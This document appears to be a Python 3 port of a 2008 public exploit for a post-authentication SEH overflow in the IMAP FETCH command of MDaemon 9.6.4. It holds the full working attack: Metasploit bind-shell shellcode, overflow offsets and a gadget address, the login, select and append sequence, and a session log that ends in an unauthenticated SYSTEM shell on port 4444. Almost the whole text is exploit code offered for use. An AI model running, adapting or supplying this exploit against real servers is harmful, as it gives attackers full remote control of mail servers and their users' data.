mdaemon-overflow.txt
Posted on 14 March 2008
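#!/usr/bin/env python3
r"""MDaemon 9.6.4 IMAP server: post-auth SEH overflow in the FETCH command.

Bug discovered and exploit coded by Matteo Memelli aka ryujin
(http://www.gray-world.net, http://www.be4mind.com).  Discovery date
03/13/2008.  Thanks, from the original header, to Silvia, didNot at
#offsec and www.offensive-security.com.

Affected version : MDaemon IMAP server v9.6.4
Tested on        : Windows 2000 SP4 English, Windows XP SP2 English,
                   Windows 2003 Standard Edition Italian

How it works
------------
An authenticated client sends a FETCH whose BODY[...] section name is
896 bytes long.  The server overwrites its SEH record at offset 532
(nSEH at 528): nSEH receives a short jump over the handler address, the
handler receives a pop/pop/ret gadget from MDaemon's own HashCash.dll,
and a Metasploit windows/shell_bind_tcp payload follows.

Operational caveats
-------------------
* Post-auth: a valid mailbox login is required.  The session log below
  shows the IMAP service running as NT AUTHORITY\SYSTEM, so any mailbox
  user becomes SYSTEM.
* The payload is an *unauthenticated* bind shell on TCP/4444: anyone who
  can reach that port on the target gets the SYSTEM shell.  The first
  connect in the log is refused because the shell needs a moment to
  start listening -- retry.
* The pop/pop/ret address (0x64dc118b) lives in HashCash.dll shipped
  with MDaemon rather than in an OS DLL, which is presumably why the
  original header calls the exploit "universal" across Windows versions;
  it is still tied to the DLL build that shipped with 9.6.4.
* The password is passed on the command line and is therefore visible
  to other local users through the process list.

Session log from the original header:

    [+] Connecting to imap server...
    * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
    [+] Logging in...
    0001 OK LOGIN completed
    [+] Selecting Inbox Folder...
    * FLAGS (Seen Answered Flagged Deleted Draft Recent)
    * 16 EXISTS
    * 16 RECENT
    0002 OK [READ-WRITE] SELECT completed
    [+] We need at least one message in Inbox, appending one...
    + Ready for append literal
    [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
    * 17 EXISTS
    * 17 RECENT
    0003 OK [APPENDUID 1205411202 17] APPEND completed
    [+] DINNER'S READY: Sending Evil Buffer...
    [+] DONE! Check your shell on 192.168.1.195:4444

    matte@badrobot:~$ nc 192.168.1.195 4444
    (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
    matte@badrobot:~$ nc 192.168.1.195 4444
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\MDaemon\APP>whoami
    NT AUTHORITY\SYSTEM

Ported from the original Python 2 script: socket I/O is bytes, the
"\x" shellcode escapes and the "\r\n" line endings that were lost in the
archived copy are restored, user name and password are sent as IMAP
quoted strings, every preparatory step waits for its tagged reply and
stops on NO/BAD, sends use sendall(), and the connection has a timeout
instead of blocking forever.
"""

from __future__ import annotations

import argparse
import socket
import sys

BANNER = """\
[*********************************************************************]
[* *]
[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]
[* DISCOVERED AND CODED *]
[* by *]
[* MATTEO MEMELLI *]
[* (ryujin) *]
[* www.be4mind.com - www.gray-world.net *]
[* *]
[*********************************************************************]"""

# Port the bind shell listens on; fixed by the payload below (LPORT=4444).
BIND_PORT = 4444

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
SHELLCODE = (
    b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
    b"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
    b"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
    b"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
    b"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
    b"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
    b"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
    b"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
    b"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
    b"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
    b"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
    b"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
    b"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
    b"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
    b"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
    b"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
    b"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
    b"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
    b"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
    b"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
    b"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
    b"\xff\xd0"
)

# Layout of the overflowing BODY[] section name ("Seh overwrite at 532 Bytes").
NSEH_OFFSET = 528
NSEH = b"\xEB\x06\x90\x90"          # jmp short +6 over the handler address; nop; nop
SEH_HANDLER = b"\x8b\x11\xdc\x64"   # 0x64dc118b: pop edi; pop ebp; ret -- mdaemon/HashCash.dll
NOP_SLED = b"\x90" * 8
TRAILER = b"C" * 35


def build_evil_buffer(shellcode: bytes = SHELLCODE) -> bytes:
    """Return the BODY[] section name that overflows the FETCH handler.

    Layout: 528 filler bytes, nSEH (short jmp +6), SEH (pop/pop/ret in
    HashCash.dll), 8 NOPs, *shellcode*, 35 trailing bytes.

    *shellcode* must be position-independent and, since it travels inside
    an IMAP command line, presumably must not contain a bare LF (0x0a) --
    the stock payload has none.  It does contain 0x0d, which the server
    evidently tolerated on its own.
    """
    return b"A" * NSEH_OFFSET + NSEH + SEH_HANDLER + NOP_SLED + shellcode + TRAILER


def build_fetch_command(evil: bytes, tag: bytes = b"A654") -> bytes:
    """Wrap *evil* in the FETCH command the original exploit sends.

    The tag and the 2:4 message set are kept verbatim from the original.
    """
    return tag + b" FETCH 2:4 (FLAGS BODY[" + evil + b" (DATE FROM)])\r\n"


def imap_quote(value: str) -> str:
    """Return *value* as an IMAP quoted string (RFC 3501 "quoted").

    The original sent the user name and password as bare atoms, which
    breaks on spaces, parentheses, quotes and other IMAP specials; a
    quoted string is accepted wherever an astring is expected.  CR, LF
    and NUL cannot be carried in a quoted string at all, so they are
    rejected.

    Raises:
        ValueError: if *value* contains CR, LF or NUL.
    """
    if any(ch in value for ch in "\r\n\0"):
        raise ValueError("IMAP quoted strings cannot contain CR, LF or NUL")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def tagged_status(reply: bytes, tag: bytes) -> bytes | None:
    """Return the status word (OK/NO/BAD) of the tagged line for *tag*, or None."""
    for line in reply.split(b"\r\n"):
        if line.startswith(tag + b" "):
            return line.split(b" ", 2)[1]
    return None


def recv_until(sock: socket.socket, *prefixes: bytes) -> bytes:
    """Read from *sock* until a complete CRLF-delimited line starts with one of *prefixes*.

    Returns everything received so far (untagged lines included).  Only
    complete lines are matched, so a partially received tagged line does
    not end the read early.

    Raises:
        ConnectionError: if the peer closes before such a line arrives.
        OSError: on socket errors, including the connection timeout.
    """
    data = b""
    while not any(line.startswith(prefixes) for line in data.split(b"\r\n")[:-1]):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection before replying")
        data += chunk
    return data


def show(data: bytes) -> None:
    """Echo a server reply as raw text, the way the original print did."""
    print(data.decode("latin-1"))


def exploit(host: str, port: int, user: str, passwd: str, timeout: float = 10.0) -> None:
    """Log in, make sure Inbox is non-empty, then send the overflowing FETCH.

    Args:
        host, port: IMAP server to attack.
        user, passwd: mailbox credentials (the bug is post-auth).
        timeout: per-operation socket timeout in seconds.

    Raises:
        OSError: on any network failure (connect, timeout, reset).
        SystemExit: via sys.exit() if the server answers NO/BAD to a
            preparatory step, since the overflow is only reachable from
            an authenticated, selected mailbox.
    """
    payload = build_fetch_command(build_evil_buffer())

    print(" [+] Connecting to imap server...")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        show(recv_until(sock, b"* "))

        print(" [+] Logging in...")
        login = f"0001 LOGIN {imap_quote(user)} {imap_quote(passwd)}\r\n"
        sock.sendall(login.encode("utf-8"))
        reply = recv_until(sock, b"0001 ")
        show(reply)
        if tagged_status(reply, b"0001") != b"OK":
            sys.exit(" [-] LOGIN rejected: this is a post-auth bug, check the credentials")

        print(" [+] Selecting Inbox Folder...")
        sock.sendall(b"0002 SELECT Inbox\r\n")
        reply = recv_until(sock, b"0002 ")
        show(reply)
        if tagged_status(reply, b"0002") != b"OK":
            sys.exit(" [-] SELECT Inbox failed")

        print(" [+] We need at least one message in Inbox, appending one...")
        sock.sendall(b"0003 APPEND Inbox {1}\r\n")
        reply = recv_until(sock, b"+", b"0003 ")
        show(reply)
        # A tagged reply instead of the "+" continuation means the APPEND was refused.
        if tagged_status(reply, b"0003") is not None:
            sys.exit(" [-] APPEND rejected")

        print(" [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?")
        # Kept byte-for-byte from the original: the literal was announced as
        # {1} but 24 bytes follow.  MDaemon accepted it (see the log in the
        # module docstring), so it is deliberately not "fixed" here.
        sock.sendall(b"SPAGHETTI AND PWNSAUCE\r\n")
        reply = recv_until(sock, b"0003 ")
        show(reply)
        if tagged_status(reply, b"0003") != b"OK":
            sys.exit(" [-] APPEND failed; the overflow needs at least one message in Inbox")

        print(" [+] DINNER'S READY: Sending Evil Buffer...")
        sock.sendall(payload)
        # No reply is waited for: the server either crashes or starts the bind shell.

    print(f" [+] DONE! Check your shell on {host}:{BIND_PORT}")


def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
    """Parse the command line; print help and exit if any option is missing.

    The flags are the original's (-H/-P/-l/-p and their long forms).
    """
    parser = argparse.ArgumentParser(
        usage="%(prog)s -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD")
    parser.add_argument("-H", "--target_host", dest="host", help="Target Host")
    parser.add_argument("-P", "--target_port", dest="port", type=int, help="Target Port")
    parser.add_argument("-l", "--login-user", dest="user", help="User login")
    parser.add_argument("-p", "--login-password", dest="passwd", help="User password")
    opts = parser.parse_args(argv)
    # Same check as the original: every option is mandatory (port 0 counts as missing).
    if not (opts.host and opts.port and opts.user and opts.passwd):
        parser.print_help()
        sys.exit()
    return opts


def main(argv: list[str] | None = None) -> None:
    """Entry point: print the banner, parse options, run the exploit."""
    print(BANNER)
    opts = parse_args(argv)
    try:
        exploit(opts.host, opts.port, opts.user, opts.passwd)
    except OSError as exc:
        sys.exit(f" [-] {exc}")


if __name__ == "__main__":
    main()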